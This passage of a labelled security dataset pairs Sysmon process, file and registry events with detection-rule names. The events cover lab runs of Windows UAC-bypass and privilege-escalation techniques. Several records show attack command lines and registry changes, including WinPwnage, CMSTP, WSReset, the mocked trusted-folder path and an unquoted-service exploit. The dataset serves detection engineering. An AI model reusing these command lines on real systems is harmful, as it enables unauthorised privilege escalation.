(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-94CD-5CD3-0000-0020DD3A0100","LogonId":"0x13add","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" 
","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-9DA4-5CD3-0000-00102E692F00","ParentProcessId":3184,"ProcessGuid":"365ABB72-9DA4-5CD3-0000-00107F7A2F00","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 03:25:24.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11267,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:25.067945Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3B92-5EB5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-4640-5EB7-0000-0010EF364B01","ParentProcessId":372,"ProcessGuid":"747F3D96-4647-5EB7-0000-0010B3454B01","ProcessId":7672,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT 
AUTHORITY\\SYSTEM","UtcTime":"2020-05-10 00:09:43.370"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":112972,"Execution_attributes":{"ProcessID":2728,"ThreadID":3432},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-10T00:09:43.372595Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 17:28:17.363","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ProcessId":2460,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp.ini","UtcTime":"2019-05-11 17:28:17.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16037,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:17.363930Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmstp.exe\" /au c:\\users\\ieuser\\appdata\\local\\temp\\tmp.ini","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.02.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7B1FF39621D704665F392CB19171B8337E042D7D,MD5=00263CA2071DC9A6EE577EB356B0D1D9,SHA256=AE11B4CD277731BA5D218A2FDB22D19EA5F2780256BC481E86ACBD8ED4CCF1C4,IMPHASH=152AEE2AB20419D44875B94A2E5E3387","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-F9CD-5CD6-0000-002065370100","LogonId":"0x13765","ParentCommandLine":"python winpwnage.py -u uac -i 17 -p c:\\windows\\System32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ParentProcessId":2460,"ProcessGuid":"365ABB72-0633-5CD7-0000-0010C6A02100","ProcessId":3840,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-11 17:28:19.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16038,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:19.567055Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CMSTP Execution Registry Event"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm","EventType":"SetValue","Image":"C:\\Windows\\system32\\DllHost.exe","ProcessGuid":"365ABB72-0545-5CD7-0000-001078371F00","ProcessId":3044,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\ProfileInstallPath","UtcTime":"2019-05-11 
17:28:22.488"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":16039,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:22.598305Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3384-5EA5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":596,"ProcessGuid":"747F3D96-B755-5EA4-0000-0010D06E2500","ProcessId":4484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 
22:19:01.724"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27334,"Execution_attributes":{"ProcessID":2752,"ThreadID":3576},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:02.057201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Renamed Binary"],"event":{"Event":{"EventData":{"CommandLine":"c:\\Program Files\\vulnsvc\\mmm.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\program.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-B764-5EA4-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"747F3D96-B764-5EA4-0000-00106F550000","ParentProcessId":584,"ProcessGuid":"747F3D96-B766-5EA4-0000-0010E7880100","ProcessId":2856,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - Potential Unquoted Service Exploit","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 
22:19:18.317"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27636,"Execution_attributes":{"ProcessID":2796,"ThreadID":3572},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:28.080717Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:29.789","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-8169-5CD5-0000-0010D7982300","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\NTWDBLIB.dll","UtcTime":"2019-05-10 13:49:29.789"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15706,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:29.789907Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 13:49:34.899","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-816E-5CD5-0000-0010FEB62300","ProcessId":1700,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-10 13:49:34.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15707,"Execution_attributes":{"ProcessID":1980,"ThreadID":1948},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T13:49:34.946157Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-00103A6B1300","ProcessId":2676,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 
02:32:48.290"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17715,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.290682Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-0010F76F1300","ProcessId":3964,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 
02:32:48.342"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17717,"Execution_attributes":{"ProcessID":2024,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T02:32:48.359432Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:10.344","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FC52-5CD6-0000-0010357F1200","ProcessId":3812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:46:10.344"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15970,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:10.344282Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:46:15.484","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FC57-5CD6-0000-00101FAF1200","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:46:15.484"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15972,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:46:15.547407Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-001031A90F04","ProcessId":1768,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:31.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5944,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.476803Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus 
Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-0010F1B20F04","ProcessId":2444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:31.572"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5946,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:31.609571Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Wsreset UAC Bypass","Bypass UAC via WSReset.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c start C:\\Windows\\system32\\cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\WSReset.exe\" 
","ParentImage":"C:\\Windows\\System32\\WSReset.exe","ParentProcessGuid":"747F3D96-B080-5D46-0000-0010D4EA0F04","ParentProcessId":2112,"ProcessGuid":"747F3D96-B091-5D46-0000-001081F71104","ProcessId":820,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 10:16:49.960"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5950,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:50.009124Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E1321204","ProcessId":1960,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 
10:16:55.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5953,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.441262Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E7381204","ProcessId":3444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:55.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5955,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.643799Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-D21D-5D3C-0000-0020DD5C2300","LogonId":"0x235cdd","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39D-5D3C-0000-0010131E5600","ProcessId":7128,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:41.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4727,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.033042Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows 
